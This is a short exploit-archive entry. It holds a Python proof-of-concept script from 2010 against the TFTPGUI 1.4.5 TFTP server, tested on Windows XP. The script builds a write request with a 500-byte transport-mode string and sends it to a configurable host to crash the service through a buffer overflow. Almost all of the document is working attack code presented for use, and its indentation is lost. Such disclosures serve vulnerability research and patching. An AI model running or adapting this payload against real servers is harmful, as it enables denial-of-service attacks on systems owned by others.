TFTPGUI version 1.4.5 long transport mode overflow exploit.
409c8e4ca280a1437d682ad977565b9f4669519e051857f3013b10e46147db6e
# Exploit Title: TFTPGUI Long Transport Mode Overflow
# Date: 5/1/2010
# Author: Jeremiah Talamantes
# Software Link: https://sourceforge.net/projects/tftputil/files/TFTPUtil/TFTPUtil%20Version%201.4.5/TFTPUtil_GUI_Version_1.4.5_Binary_Installer.exe/download
# Version: 1.4.5
# Tested on: Windows XP, SP2 (En)
# CVE : N/A
#!/usr/bin/python
print "\n#################################################################"
print "## RedTeam Security ##"
print "## TFTPGUI Long Transport Mode Overflow ##"
print "## Version 1.4.5 ##"
print "## LIST Vulnerability ##"
print "## ##"
print "## Jeremiah Talamantes ##"
print "## labs@redteamsecure.com ##"
print "################################################################# \n"
import socket
import sys
# Change these values to suit your needs
host = '192.168.1.108'
port = 69
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print "Error: unable to connect."
sys.exit(1)
# Creating the overly long transport mode string
fn = "A"
md = "A" * 500
stuff = "\x00\x02" + fn + "\0" + md + "\0"
# Send data
s.sendto(stuff, (host, port))
print "Check to see if TFTPGUI is still running..."
# End